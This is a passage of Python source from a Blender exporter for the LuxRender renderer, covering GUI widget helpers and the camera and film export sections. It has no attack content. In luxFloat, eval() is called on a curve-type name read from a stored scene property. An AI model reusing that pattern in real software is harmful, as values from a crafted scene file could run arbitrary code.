	getRect() hands out widget rectangles in GUI pixel coordinates, wrapping
	to a new line automatically when the current row is full; newline() starts
	a fresh row and can draw a section caption, icon and background color.
	"""
	def __init__(self, y=200):
		self.x = 110                  # left start position after captions
		self.xmax = 110 + 2*(140+4)   # right edge: two default-width columns
		self.y = y
		self.w = 140                  # default element width in pixels
		self.h = 18                   # default element height in pixels
		self.hmax = 0                 # tallest element placed on the current row
		self.xgap = 4
		self.ygap = 4
		self.resethmax = False        # set by newline(); clears hmax on next getRect()
	def getRect(self, wu, hu):
		"""Reserve a wu x hu (in element units) rectangle; returns [x, y, w, h]."""
		width = int(self.w*wu + self.xgap*(wu-1))
		height = int(self.h*hu + self.ygap*(hu-1))
		if self.x + width > self.xmax:
			self.newline()            # row full: wrap
		if self.resethmax:
			self.hmax = 0
			self.resethmax = False
		rect = [int(self.x), int(self.y - height), int(width), int(height)]
		self.x += int(width + self.xgap)
		self.hmax = max(self.hmax, int(height + self.ygap))
		return rect
	def newline(self, title="", distance=0, level=0, icon=None, color=None):
		"""Advance to the next row; optionally draw a caption, icon and background."""
		self.x = 110
		if not self.resethmax:
			self.y -= int(self.hmax + distance)
		if color is not None:
			# tinted background strip behind the whole row
			BGL.glColor3f(color[0], color[1], color[2])
			BGL.glRectf(0, self.y - self.hmax, self.xmax, self.y + distance)
			BGL.glColor3f(0.9, 0.9, 0.9)
		if icon is not None:
			drawIcon(icon, 2 + level*10, self.y - 16)
		self.resethmax = True
		if title != "":
			self.getRect(0, 1)
			BGL.glColor3f(0.9, 0.9, 0.9)
			BGL.glRasterPos2i(20 + level*10, self.y - self.h + 5)
			Draw.Text(title)
def luxHelp(name, lux, caption, hint, gui, width=1.0):
	"""Draw a boolean toggle with a help icon overlay; return the scene-file snippet.

	When *gui* is None nothing is drawn and only the '"bool name" ["true|false"]'
	export string is returned.
	"""
	if gui:
		r = gui.getRect(width, 1)
		Draw.Toggle(caption, evtLuxGui, r[0], r[1], r[2], r[3], lux.get() == "true", hint,
			lambda e, v: lux.set(["false", "true"][bool(v)]))
		drawIcon(icon_help, r[0], r[1])
	return "\n \"bool %s\" [\"%s\"]"%(name, lux.get())
# lux parameter types
def luxOption(name, lux, options, caption, hint, gui, width=1.0):
	"""Draw a dropdown menu choosing among *options*; return the scene-file snippet.

	If the current value is not in *options* the property is reset to its
	default; if that is also unknown, the first option is selected for display.
	When *gui* is None nothing is drawn.
	"""
	if gui:
		menustr = caption + ": %t"
		for i, v in enumerate(options):
			menustr = "%s %%x%d|%s"%(v, i, menustr)
		try:
			sel = options.index(lux.get())
		except ValueError:
			try:
				lux.set(lux.default) # not found, so try default value
				sel = options.index(lux.get())
			except ValueError:
				print("value %s not found in options list"%(lux.get()))
				sel = 0
		r = gui.getRect(width, 1)
		Draw.Menu(menustr, evtLuxGui, r[0], r[1], r[2], r[3], sel, hint, lambda e, v: lux.set(options[v]))
	return "\n \"string %s\" [\"%s\"]"%(name, lux.get())
def luxOptionRect(name, lux, options, caption, hint, gui, x, y, xx, yy):
	"""Like luxOption, but draws the menu at an explicit rectangle (x, y, xx, yy)
	instead of requesting a layout slot from *gui*.  Returns the export snippet."""
	if gui:
		menustr = caption + ": %t"
		for i, v in enumerate(options):
			menustr = "%s %%x%d|%s"%(v, i, menustr)
		try:
			sel = options.index(lux.get())
		except ValueError:
			try:
				lux.set(lux.default) # not found, so try default value
				sel = options.index(lux.get())
			except ValueError:
				print ("value %s not found in options list"%(lux.get()))
				sel = 0
		Draw.Menu(menustr, evtLuxGui, x, y, xx, yy, sel, hint, lambda e, v: lux.set(options[v]))
	return "\n \"string %s\" [\"%s\"]"%(name, lux.get())
def luxIdentifier(name, lux, options, caption, hint, gui, icon=None, width=1.0):
	"""Emit a top-level scene-file identifier plus its type option menu.

	Draws a colored section header row when *gui* is given, then delegates the
	option menu to luxOption.  Returns e.g. '\\nname "value"'.
	"""
	if gui:
		gui.newline(caption + ":", 8, 0, icon, [0.75, 0.5, 0.25])
	luxOption(name, lux, options, caption, hint, gui, width)
	return "\n%s \"%s\""%(name, lux.get())
def luxFloat(name, lux, min, max, caption, hint, gui, width=1.0, useslider=0):
    # Draw a float control (number field or slider) for a lux property and
    # return its scene-file parameter string: '\n "float <name>" [<value>]'.
    # When the scene-level "useparamkeys" option is enabled the value can be
    # driven by a Blender IPO curve, optionally remapped from a [fmin, fmax]
    # curve range onto a [tmin, tmax] target range.
    # NOTE: 'min'/'max' intentionally shadow the builtins (file-wide convention).
    if gui:
        if (luxProp(Scene.GetCurrent(), "useparamkeys", "false").get()=="true"):
            # reserve a narrow strip on the right for the "I" (IPO) toggle below
            r = gui.getRect(width-0.12, 1)
        else:
            r = gui.getRect(width, 1)
        # Value
        if(useslider==1):
            Draw.Slider(caption+": ", evtLuxGui, r[0], r[1], r[2], r[3], lux.getFloat(), min, max, 0, hint, lambda e,v: lux.set(v))
        else:
            Draw.Number(caption+": ", evtLuxGui, r[0], r[1], r[2], r[3], lux.getFloat(), min, max, hint, lambda e,v: lux.set(v))
        if (luxProp(Scene.GetCurrent(), "useparamkeys", "false").get()=="true"):
            # IPO Curve
            obj = lux.getobj()
            keyname = lux.getname()
            useipo = luxProp(obj, keyname+".IPOuse", "false")
            i = gui.getRect(0.12, 1)
            Draw.Toggle("I", evtLuxGui, i[0], i[1], i[2], i[3], useipo.get()=="true", "Use IPO Curve", lambda e,v: useipo.set(["false","true"][bool(v)]))
            if useipo.get() == "true":
                if gui: gui.newline(caption+"IPO:", 8, 0, None, [0.5,0.45,0.35])
                curve = luxProp(obj, keyname+".IPOCurveName", "")
                if curve.get() == "":
                    c = gui.getRect(2.0, 1)
                else:
                    c = gui.getRect(1.1, 1)
                Draw.String("Ipo:", evtLuxGui, c[0], c[1], c[2], c[3], curve.get(), 250, "Set IPO Name", lambda e,v: curve.set(v))
                usemapping = luxProp(obj, keyname+".IPOmap", "false")
                icu_value = 0
                # Apply IPO to value
                if curve.get() != "":
                    try:
                        ipoob = Blender.Ipo.Get(curve.get())
                    except:
                        # named IPO does not exist (anymore): clear the reference
                        curve.set("")
                        pass
                if curve.get() != "":
                    names = list([x[0] for x in ipoob.curveConsts.items()])
                    ipotype = luxProp(obj, keyname+".IPOCurveType", "OB_LOCZ")
                    luxOption("ipocurve", ipotype, names, "IPO Curve", "Set IPO Curve", gui, 0.6)
                    # eval() resolves the curve-type constant by name,
                    # e.g. "OB_LOCZ" -> Blender.Ipo.OB_LOCZ
                    icu = ipoob[eval("Blender.Ipo.%s" % (ipotype.get()))]
                    # sample the curve at the current frame
                    icu_value = icu[Blender.Get('curframe')]
                    if usemapping.get() == "false": # if true is set during mapping below
                        lux.set(icu_value)
                    # Mapping options
                    m = gui.getRect(0.3, 1)
                    Draw.Toggle("Map", evtLuxGui, m[0], m[1], m[2], m[3], usemapping.get()=="true", "Edit Curve mapping", lambda e,v: usemapping.set(["false","true"][bool(v)]))
                    if usemapping.get() == "true":
                        if gui: gui.newline(caption+"IPO:", 8, 0, None, [0.5,0.45,0.35])
                        fmin = luxProp(obj, keyname+".IPOCurvefmin", 0.0)
                        luxFloatNoIPO("ipofmin", fmin, -100, 100, "fmin", "Map minimum value from Curve", gui, 0.5)
                        fmax = luxProp(obj, keyname+".IPOCurvefmax", 1.0)
                        luxFloatNoIPO("ipofmax", fmax, -100, 100, "fmax", "Map maximum value from Curve", gui, 0.5)
                        tmin = luxProp(obj, keyname+".IPOCurvetmin", min)
                        luxFloatNoIPO("ipotmin", tmin, min, max, "tmin", "Map miminum value to", gui, 0.5)
                        tmax = luxProp(obj, keyname+".IPOCurvetmax", max)
                        luxFloatNoIPO("ipotmax", tmax, min, max, "tmax", "Map maximum value to", gui, 0.5)
                        # linear remap: curve range [fmin, fmax] -> target [tmin, tmax]
                        # NOTE(review): divides by (fmax - fmin); equal bounds
                        # would raise ZeroDivisionError — confirm acceptable
                        sval = (icu_value - fmin.getFloat()) / (fmax.getFloat() - fmin.getFloat())
                        lux.set(tmin.getFloat() + (sval * (tmax.getFloat() - tmin.getFloat())))
                    # invert
                    #v = gui.getRect(0.5, 1)
                    #Draw.Toggle("Invert", evtLuxGui, v[0], v[1], v[2], v[3], useipo.get()=="true", "Invert Curve values", lambda e,v: useipo.set(["false","true"][bool(v)]))
    else:
        # headless/export path: no widgets are drawn, but the IPO evaluation
        # must still run so the exported value matches the GUI behaviour
        if (luxProp(Scene.GetCurrent(), "useparamkeys", "false").get()=="true"):
            obj = lux.getobj()
            keyname = lux.getname()
            useipo = luxProp(obj, keyname+".IPOuse", "false")
            if useipo.get() == "true":
                curve = luxProp(obj, keyname+".IPOCurveName", "")
                try:
                    ipoob = Blender.Ipo.Get(curve.get())
                except:
                    curve.set("")
                    pass
                usemapping = luxProp(obj, keyname+".IPOmap", "false")
                icu_value = 0
                if curve.get() != "":
                    names = list([x[0] for x in ipoob.curveConsts.items()])
                    ipotype = luxProp(obj, keyname+".IPOCurveType", "OB_LOCZ")
                    icu = ipoob[eval("Blender.Ipo.%s" % (ipotype.get()))]
                    icu_value = icu[Blender.Get('curframe')]
                    if usemapping.get() == "false": # if true is set during mapping below
                        lux.set(icu_value)
                    if usemapping.get() == "true":
                        if gui: gui.newline(caption+"IPO:", 8, 0, None, [0.5,0.45,0.35])
                        fmin = luxProp(obj, keyname+".IPOCurvefmin", 0.0)
                        fmax = luxProp(obj, keyname+".IPOCurvefmax", 1.0)
                        tmin = luxProp(obj, keyname+".IPOCurvetmin", min)
                        tmax = luxProp(obj, keyname+".IPOCurvetmax", max)
                        sval = (icu_value - fmin.getFloat()) / (fmax.getFloat() - fmin.getFloat())
                        lux.set(tmin.getFloat() + (sval * (tmax.getFloat() - tmin.getFloat())))
    return "\n \"float %s\" [%f]"%(name, lux.getFloat())
def luxFloatNoIPO(name, lux, min, max, caption, hint, gui, width=1.0, useslider=0):
    """Draw a plain float control (no IPO-curve support) and return the lux
    float parameter string."""
    if gui:
        rect = gui.getRect(width, 1)
        if useslider == 1:
            Draw.Slider(caption+": ", evtLuxGui, rect[0], rect[1], rect[2], rect[3],
                        lux.getFloat(), min, max, 0, hint, lambda e, v: lux.set(v))
        else:
            Draw.Number(caption+": ", evtLuxGui, rect[0], rect[1], rect[2], rect[3],
                        lux.getFloat(), min, max, hint, lambda e, v: lux.set(v))
    return "\n \"float %s\" [%f]"%(name, lux.getFloat())
def luxInt(name, lux, min, max, caption, hint, gui, width=1.0):
    """Draw an integer number field and return the lux integer parameter string."""
    if gui:
        rect = gui.getRect(width, 1)
        Draw.Number(caption+": ", evtLuxGui, rect[0], rect[1], rect[2], rect[3],
                    lux.getInt(), min, max, hint, lambda e, v: lux.set(v))
    return "\n \"integer %s\" [%d]"%(name, lux.getInt())
def luxBool(name, lux, caption, hint, gui, width=1.0):
    """Draw a toggle button for a "true"/"false" string property and return
    the lux bool parameter string."""
    if gui:
        rect = gui.getRect(width, 1)
        pressed = lux.get() == "true"
        Draw.Toggle(caption, evtLuxGui, rect[0], rect[1], rect[2], rect[3], pressed, hint,
                    lambda e, v: lux.set(["false", "true"][bool(v)]))
    return "\n \"bool %s\" [\"%s\"]"%(name, lux.get())
def luxLabel(caption, gui):
    """Draw a static text label spanning two gui columns; emits no parameter."""
    if gui:
        rect = gui.getRect(2, 1)
        # raise the raster position slightly so the text is vertically centered
        BGL.glRasterPos2i(rect[0], rect[1]+5)
        Draw.Text(caption)
def luxCollapse(name, lux, caption, hint, gui, width=1.0):
    """Draw a collapsible-section toggle with an expand/collapse arrow and
    return the lux bool parameter string."""
    if gui:
        rect = gui.getRect(width, 1)
        expanded = lux.get() == "true"
        if expanded:
            drawArrow(arrow_down, rect[0]-22, rect[1]-2)
        else:
            drawArrow(arrow_right, rect[0]-22, rect[1]-2)
        Draw.Toggle(caption, evtLuxGui, rect[0], rect[1], rect[2], rect[3], expanded, hint,
                    lambda e, v: lux.set(["false", "true"][bool(v)]))
    return "\n \"bool %s\" [\"%s\"]"%(name, lux.get())
def luxString(name, lux, caption, hint, gui, width=1.0):
    """Draw a text input field; return the lux string parameter only when the
    value differs from the property default (keeps the export minimal)."""
    if gui:
        rect = gui.getRect(width, 1)
        Draw.String(caption+": ", evtLuxGui, rect[0], rect[1], rect[2], rect[3],
                    lux.get(), 250, hint, lambda e, v: lux.set(v))
    if lux.get() == lux.default:
        return ""
    return "\n \"string %s\" [\"%s\"]"%(name, luxstr(lux.get()))
def luxFile(name, lux, caption, hint, gui, width=1.0):
    """Draw a file-name input with a "..." browse button; return the lux
    string parameter containing the (possibly relativized) file path."""
    if gui:
        rect = gui.getRect(width, 1)
        # text field occupies the row minus a square button on the right
        Draw.String(caption+": ", evtLuxGui, rect[0], rect[1], rect[2]-rect[3]-2, rect[3],
                    lux.get(), 250, hint, lambda e, v: lux.set(v))
        Draw.Button("...", 0, rect[0]+rect[2]-rect[3], rect[1], rect[3], rect[3],
                    "click to open file selector",
                    lambda e, v: Window.FileSelector(lambda s: lux.set(s), "Select %s"%(caption), lux.get()))
    return "\n \"string %s\" [\"%s\"]"%(name, luxstr(luxFilePath(lux.get())))
def luxPath(name, lux, caption, hint, gui, width=1.0):
    """Draw a directory input with a "..." browse button; the stored value is
    normalized to a directory path ending in os.sep. Returns the lux string
    parameter."""
    if gui:
        rect = gui.getRect(width, 1)
        # selecting a file in the browser stores its directory, not the file
        Draw.String(caption+": ", evtLuxGui, rect[0], rect[1], rect[2]-rect[3]-2, rect[3],
                    lux.get(), 250, hint,
                    lambda e, v: lux.set(Blender.sys.dirname(v)+os.sep))
        Draw.Button("...", 0, rect[0]+rect[2]-rect[3], rect[1], rect[3], rect[3],
                    "click to open file selector",
                    lambda e, v: Window.FileSelector(lambda s: lux.set(s), "Select %s"%(caption), lux.get()))
    return "\n \"string %s\" [\"%s\"]"%(name, luxstr(lux.get()))
def luxRGB(name, lux, max, caption, hint, gui, width=2.0):
    # Draw a color picker plus R/G/B number fields for a color property and
    # return its scene-file parameter string: '\n "color <name>" [...]'.
    # If max > 1.0 the color may be HDR: the widgets operate on a version
    # normalized by 'scale' (the largest component) and an extra "s:" field
    # edits that scale factor.
    if gui:
        r = gui.getRect(width, 1)
        scale = 1.0
        rgb = lux.getRGB()
        if max > 1.0:
            # normalize so the picker always receives components in [0, 1]
            for i in range(3):
                if rgb[i] > scale: scale = rgb[i]
            rgb = (rgb[0]/scale, rgb[1]/scale, rgb[2]/scale)
        Draw.ColorPicker(evtLuxGui, r[0], r[1], r[3], r[3], rgb, "click to select color", lambda e,v: lux.setRGB((v[0]*scale,v[1]*scale,v[2]*scale)))
        w = int((r[2]-r[3])/3); m = max
        if max > 1.0:
            # make room for the fourth ("s:" scale) field
            w = int((r[2]-r[3])/4); m = 1.0
        # Draw.Create wrappers expose .val handles; each lambda reads the
        # other channels' .val so editing one field re-sets the full triple
        drawR, drawG, drawB, drawS = Draw.Create(rgb[0]), Draw.Create(rgb[1]), Draw.Create(rgb[2]), Draw.Create(scale)
        drawR = Draw.Number("R:", evtLuxGui, r[0]+r[3], r[1], w, r[3], drawR.val, 0.0, m, "red", lambda e,v: lux.setRGB((v*scale,drawG.val*scale,drawB.val*scale)))
        drawG = Draw.Number("G:", evtLuxGui, r[0]+r[3]+w, r[1], w, r[3], drawG.val, 0.0, m, "green", lambda e,v: lux.setRGB((drawR.val*scale,v*scale,drawB.val*scale)))
        drawB = Draw.Number("B:", evtLuxGui, r[0]+r[3]+2*w, r[1], w, r[3], drawB.val, 0.0, m, "blue", lambda e,v: lux.setRGB((drawR.val*scale,drawG.val*scale,v*scale)))
        if max > 1.0:
            Draw.Number("s:", evtLuxGui, r[0]+r[3]+3*w, r[1], w, r[3], drawS.val, 0.0, max, "color scale", lambda e,v: lux.setRGB((drawR.val*v,drawG.val*v,drawB.val*v)))
    if max <= 1.0:
        # NOTE(review): getRGC() presumably returns a (reverse) gamma-corrected
        # value string — confirm against the luxProp implementation
        return "\n \"color %s\" [%s]"%(name, lux.getRGC())
    return "\n \"color %s\" [%s]"%(name, lux.get())
def luxVector(name, lux, min, max, caption, hint, gui, width=2.0):
    """Draw three number fields (x, y, z) for a vector property and return
    the lux vector parameter string."""
    if gui:
        rect = gui.getRect(width, 1)
        vec = lux.getVector()
        third = int(rect[2]/3)
        # Draw.Create wrappers give the lambdas .val handles; each callback
        # reads the other two components so one edit updates the whole vector
        numX, numY, numZ = Draw.Create(vec[0]), Draw.Create(vec[1]), Draw.Create(vec[2])
        numX = Draw.Number("x:", evtLuxGui, rect[0], rect[1], third, rect[3], numX.val, min, max, "", lambda e, v: lux.setVector((v, numY.val, numZ.val)))
        numY = Draw.Number("y:", evtLuxGui, rect[0]+third, rect[1], third, rect[3], numY.val, min, max, "", lambda e, v: lux.setVector((numX.val, v, numZ.val)))
        numZ = Draw.Number("z:", evtLuxGui, rect[0]+2*third, rect[1], third, rect[3], numZ.val, min, max, "", lambda e, v: lux.setVector((numX.val, numY.val, v)))
    return "\n \"vector %s\" [%s]"%(name, lux.get())
def luxVectorUniform(name, lux, min, max, caption, hint, gui, width=2.0):
    # Draw either a single uniform value field or three x/y/z fields for a
    # vector property, switchable via the "U" toggle; returns the parameter
    # string '\n "vector <name>" [...]'.
    def setUniform(lux, value):
        # re-store the property so it switches representation between a
        # single float (uniform) and a 3-component vector
        if value: lux.set(lux.getFloat())
        else: lux.setVector(lux.getVector())
    if gui:
        r = gui.getRect(width, 1)
        vec = lux.getVector()
        Draw.Toggle("U", evtLuxGui, r[0], r[1], gui.h, gui.h, lux.isFloat(), "uniform", lambda e,v: setUniform(lux, v))
        if lux.isFloat():
            # uniform mode: one field edits the single value
            Draw.Number("v:", evtLuxGui, r[0]+gui.h, r[1], r[2]-gui.h, r[3], lux.getFloat(), min, max, "", lambda e,v: lux.set(v))
        else:
            w = int((r[2]-gui.h)/3)
            # lambdas read the sibling .val handles so one edit updates the whole vector
            drawX, drawY, drawZ = Draw.Create(vec[0]), Draw.Create(vec[1]), Draw.Create(vec[2])
            drawX = Draw.Number("x:", evtLuxGui, r[0]+gui.h, r[1], w, r[3], drawX.val, min, max, "", lambda e,v: lux.setVector((v,drawY.val,drawZ.val)))
            drawY = Draw.Number("y:", evtLuxGui, r[0]+w+gui.h, r[1], w, r[3], drawY.val, min, max, "", lambda e,v: lux.setVector((drawX.val,v,drawZ.val)))
            drawZ = Draw.Number("z:", evtLuxGui, r[0]+2*w+gui.h, r[1], w, r[3], drawZ.val, min, max, "", lambda e,v: lux.setVector((drawX.val,drawY.val,v)))
    return "\n \"vector %s\" [%s]"%(name, lux.getVectorStr())
# lux individual identifiers
def luxCamera(cam, context, gui=None):
    # Build the "Camera" section of the exported scene file and, when gui is
    # given, draw the matching camera settings panel.
    #   cam:     Blender camera data block
    #   context: Blender rendering context (used for aspect ratio / border)
    #   gui:     panel object, or None for headless export
    # Returns the accumulated parameter string.
    global icon_c_camera
    str = ""
    if cam:
        camtype = luxProp(cam, "camera.type", "perspective")
        # Radiance - remarked 'realistic' for v0.6 release
        #str = luxIdentifier("Camera", camtype, ["perspective","orthographic","environment","realistic"], "CAMERA", "select camera type", gui, icon_c_camera)
        str = luxIdentifier("Camera", camtype, ["perspective","orthographic","environment"], "CAMERA", "select camera type", gui, icon_c_camera)
        scale = 1.0
        if camtype.get() == "perspective":
            if gui: gui.newline(" View:")
            str += luxFloat("fov", luxAttr(cam, "angle"), 8.0, 170.0, "fov", "camera field-of-view angle", gui)
            # focal length is shown but not exported directly; it feeds the
            # f/stop <-> lens-radius conversion in the DOF section below
            fl = luxAttr(cam, "lens")
            if gui:
                luxFloat("lens", fl, 1.0, 250.0, "focallength", "camera focal length", gui)
        if camtype.get() == "orthographic" :
            str += luxFloat("scale", luxAttr(cam, "scale"), 0.01, 1000.0, "scale", "orthographic camera scale", gui)
            # half the ortho scale widens the screenwindow computed below
            scale = cam.scale / 2
        # Clipping
        # useclip = luxProp(cam, "useclip", "false")
        # luxCollapse("useclip", useclip, "Near & Far Clipping", "Enable Camera near and far clipping options", gui, 2.0)
        # if(useclip.get() == "true"):
        #     if gui: gui.newline(" Clipping:")
        #     str += luxFloat("hither", luxAttr(cam, "clipStart"), 0.0, 100.0, "start", "near clip distance", gui)
        #     str += luxFloat("yon", luxAttr(cam, "clipEnd"), 1.0, 10000.0, "end", "far clip distance", gui)
        # Depth of Field
        usedof = luxProp(cam, "usedof", "false")
        if camtype.get() in ["perspective", "orthographic"]:
            luxCollapse("usedof", usedof, "Depth of Field", "Enable Depth of Field options", gui, 2.0)
        if usedof.get() == "true":
            if gui: gui.newline(" DOF:")
            lr = luxProp(cam, "camera.lensradius", 0.01)
            fs = luxProp(cam, "camera.fstop", 2.8)
            if camtype.get() == "perspective":
                usefstop = luxProp(cam, "usefstop", "false")
                luxBool("usefstop", usefstop, "Use f/stop", "Use f/stop to define DOF effect", gui, 1.0)
                LR_SCALE = 1000.0 # lr in metres -> mm
                FL_SCALE = 1.0 # fl in mm -> mm
                # conversions between lens radius r and f-number N: N = f / (2 r)
                def lr_2_fs(fl, lr):
                    # epsilon avoids division by zero for a zero lens radius
                    lr += 0.00000001
                    return fl / ( 2.0 * lr )
                def fs_2_lr(fl, fs):
                    return fl / ( 2.0 * fs )
                if usefstop.get() == 'true':
                    # f/stop is the editable control; keep lensradius in sync
                    # and export it without drawing its own widget
                    lr.set(fs_2_lr(fl.get() * FL_SCALE, fs.get()) / LR_SCALE)
                    luxFloat("fstop", fs, 0.9, 64.0, "fstop", "Defines the lens aperture.", gui)
                    str += luxFloat("lensradius", lr, 0.0, 1.0, "", "", None)
                else:
                    # lensradius is the editable control; keep f/stop in sync
                    fs.set(lr_2_fs(fl.get() * FL_SCALE, lr.get() * LR_SCALE))
                    str += luxFloat("lensradius", lr, 0.0, 1.0, "lens-radius", "Defines the lens radius. Values higher than 0. enable DOF and control the amount", gui)
            else:
                str += luxFloat("lensradius", lr, 0.0, 1.0, "lens-radius", "Defines the lens radius. Values higher than 0. enable DOF and control the amount", gui)
            # focustype = luxProp(cam, "camera.focustype", "autofocus")
            # luxOption("focustype", focustype, ["autofocus", "manual", "object"], "Focus Type", "Choose the focus behaviour", gui)
            # if focustype.get() == "autofocus":
            #     str += luxBool("autofocus",luxProp(cam, "camera.autofocus", "true"), "autofocus", "Enable automatic focus", gui)
            # if focustype.get() == "object":
            #     objectfocus = luxProp(cam, "camera.objectfocus", "")
            #     luxString("objectfocus", objectfocus, "object", "Always focus camera on named object", gui, 1.0)
            #     dofdist = luxAttr(cam, "dofDist")
            #     str += luxFloat("focaldistance", dofdist, 0.0, 100.0, "distance", "Distance from the camera at which objects will be in focus. Has no effect if Lens Radius is 0", gui)
            #     if objectfocus.get() != "":
            #         try:
            #             setFocus(objectfocus.get())
            #         except:
            #             luxProp(cam, "camera.objectfocus", "").set("")
            #             Draw.PupMenu("WARNING: focus-object does not match existing object-name")
            #             if LuxIsGUI: Draw.Redraw()
            if True: # focustype.get() == "manual":
                dofdist = luxAttr(cam, "dofDist")
                str += luxFloat("focaldistance", dofdist, 0.0, 100.0, "distance", "Distance from the camera at which objects will be in focus. Has no effect if Lens Radius is 0", gui)
                if gui:
                    # quick-focus helpers: selected object / 3D cursor
                    Draw.Button("S", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, "focus selected object", lambda e,v:setFocus("S"))
                    Draw.Button("C", evtLuxGui, gui.x+gui.h, gui.y-gui.h, gui.h, gui.h, "focus cursor", lambda e,v:setFocus("C"))
        useaspect = luxProp(cam, "useaspectratio", "false")
        aspectratio = luxProp(cam, "ratio", 1.3333)
        if camtype.get() in ["perspective", "orthographic"]:
            if context:
                if useaspect.get() == "true":
                    ratio = 1./aspectratio.get()
                else:
                    ratio = float(context.sizeY)/float(context.sizeX)
                # screenwindow maps the camera shift + aspect onto lux's
                # normalized [-1, 1] image plane; the short axis gets ratio
                if ratio < 1.0:
                    screenwindow = [(2*cam.shiftX-1)*scale, (2*cam.shiftX+1)*scale, (2*cam.shiftY-ratio)*scale, (2*cam.shiftY+ratio)*scale]
                else:
                    screenwindow = [(2*cam.shiftX-1/ratio)*scale, (2*cam.shiftX+1/ratio)*scale, (2*cam.shiftY-1)*scale, (2*cam.shiftY+1)*scale]
                # render region option
                if context.borderRender:
                    (x1,y1,x2,y2) = context.border
                    # interpolate the window corners to the border rectangle
                    screenwindow = [screenwindow[0]*(1-x1)+screenwindow[1]*x1, screenwindow[0]*(1-x2)+screenwindow[1]*x2,\
                        screenwindow[2]*(1-y1)+screenwindow[3]*y1, screenwindow[2]*(1-y2)+screenwindow[3]*y2]
                str += "\n \"float screenwindow\" [%f %f %f %f]"%(screenwindow[0], screenwindow[1], screenwindow[2], screenwindow[3])
        # Motion Blur Options (common to all cameras)
        usemblur = luxProp(cam, "usemblur", "false")
        luxCollapse("usemblur", usemblur, "Motion Blur", "Enable Motion Blur", gui, 2.0)
        if(usemblur.get() == "true"):
            if gui: gui.newline(" Shutter:")
            mblurpreset = luxProp(cam, "mblurpreset", "true")
            luxBool("mblurpreset", mblurpreset, "Preset", "Enable use of Shutter Presets", gui, 0.4)
            if(mblurpreset.get() == "true"):
                shutterpresets = ["full frame", "half frame", "quarter frame", "1/25", "1/30", "1/45", "1/60", "1/85", "1/125", "1/250", "1/500"]
                shutterpreset = luxProp(cam, "camera.shutterspeedpreset", "full frame")
                luxOption("shutterpreset", shutterpreset, shutterpresets, "shutterspeed", "Choose the Shutter speed preset.", gui, 1.0)
                fpspresets = ["10 FPS", "12 FPS", "20 FPS", "25 FPS", "29.99 FPS", "30 FPS", "50 FPS", "60 FPS"]
                shutfps = luxProp(cam, "camera.shutfps", "25 FPS")
                luxOption("shutfps", shutfps, fpspresets, "@", "Choose the number of frames per second as the time base.", gui, 0.6)
                # translate the fps preset label to a number
                sfps = shutfps.get()
                fps = 25
                if sfps == "10 FPS": fps = 10
                elif sfps == "12 FPS": fps = 12
                elif sfps == "20 FPS": fps = 20
                elif sfps == "25 FPS": fps = 25
                elif sfps == "29.99 FPS": fps = 29.99
                elif sfps == "30 FPS": fps = 30
                elif sfps == "50 FPS": fps = 50
                elif sfps == "60 FPS": fps = 60
                # shutter times are expressed in frame units: 1.0 == one frame;
                # NOTE: 'open' intentionally shadows the builtin here
                spre = shutterpreset.get()
                open = 0.0
                close = 1.0
                if spre == "full frame": close = 1.0
                elif spre == "half frame": close = 0.5
                elif spre == "quarter frame": close = 0.25
                elif spre == "1/25": close = 1.0 / 25.0 * fps
                elif spre == "1/30": close = 1.0 / 30.0 * fps
                elif spre == "1/45": close = 1.0 / 45.0 * fps
                elif spre == "1/60": close = 1.0 / 60.0 * fps
                elif spre == "1/85": close = 1.0 / 85.0 * fps
                elif spre == "1/125": close = 1.0 / 125.0 * fps
                elif spre == "1/250": close = 1.0 / 250.0 * fps
                elif spre == "1/500": close = 1.0 / 500.0 * fps
                str += "\n \"float shutteropen\" [%f]\n \"float shutterclose\" [%f] "%(open,close)
            else:
                # manual shutter timing
                str += luxFloat("shutteropen", luxProp(cam, "camera.shutteropen", 0.0), 0.0, 100.0, "open", "time in seconds when shutter opens", gui, 0.8)
                str += luxFloat("shutterclose", luxProp(cam, "camera.shutterclose", 1.0), 0.0, 100.0, "close", "time in seconds when shutter closes", gui, 0.8)
            # str += luxOption("shutterdistribution", luxProp(cam, "camera.shutterdistribution", "uniform"), ["uniform", "gaussian"], "distribution", "Choose the shutter sampling distribution.", gui, 2.0)
            # these two only draw toggles; they are read elsewhere by the exporter
            objectmblur = luxProp(cam, "objectmblur", "true")
            luxBool("objectmblur", objectmblur, "Object", "Enable Motion Blur for scene object motions", gui, 1.0)
            cammblur = luxProp(cam, "cammblur", "true")
            luxBool("cammblur", cammblur, "Camera", "Enable Motion Blur for Camera motion", gui, 1.0)
    return str
def get_render_resolution(scn, gui = None):
    """Return the effective render resolution (xr, yr) in pixels.

    Reads Blender's render context size and applies the "film.scale"
    percentage property, which is stored as a string like "100 %".

    Args:
        scn: Blender scene to query.
        gui: unused; kept for interface compatibility with existing callers.

    Returns:
        (xr, yr): scaled width and height as integers.
    """
    context = scn.getRenderingContext()
    # property value looks like "75 %": drop the trailing '%' and parse
    # (int() tolerates the remaining surrounding whitespace)
    scale_prop = luxProp(scn, "film.scale", "100 %")
    percent = int(scale_prop.get()[:-1])
    # floor division keeps the pixel dimensions integral on both Python 2
    # and Python 3; plain '/' would return floats under Python 3
    xr = luxAttr(context, "sizeX").get()*percent//100
    yr = luxAttr(context, "sizeY").get()*percent//100
    return xr, yr
def luxFilm(scn, gui=None):
    # Build the "Film" section of the exported scene file and, when gui is
    # given, draw the resolution controls. Returns the accumulated parameter
    # string. Only the "image" film type exists in this version; the large
    # commented blocks below are options disabled for this release.
    str = ""
    if scn:
        filmtype = luxProp(scn, "film.type", "image")
        str = luxIdentifier("Film", filmtype, ["image"], "FILM", "select film type", gui)
        if filmtype.get() == "image":
            context = scn.getRenderingContext()
            if context:
                if gui: gui.newline(" Resolution:")
                # xr/yr already include the "film.scale" percentage
                xr,yr = get_render_resolution(scn, gui)
                luxInt("xresolution", luxAttr(context, "sizeX"), 0, 8192, "X", "width of the render", gui, 0.666)
                luxInt("yresolution", luxAttr(context, "sizeY"), 0, 8192, "Y", "height of the render", gui, 0.666)
                scale = luxProp(scn, "film.scale", "100 %")
                luxOption("", scale, ["400 %", "200 %", "100 %", "75 %", "50 %", "25 %"], "scale", "scale resolution", gui, 0.666)
                # render region option
                if context.borderRender:
                    (x1,y1,x2,y2) = context.border
                    if (x1==x2) and (y1==y2): print("WARNING: empty render-region, use SHIFT-B to set render region in Blender.")
                    # shrink the exported resolution to the border rectangle
                    str += "\n \"integer xresolution\" [%d] \n \"integer yresolution\" [%d]"%(xr*(x2-x1), yr*(y2-y1))
                else:
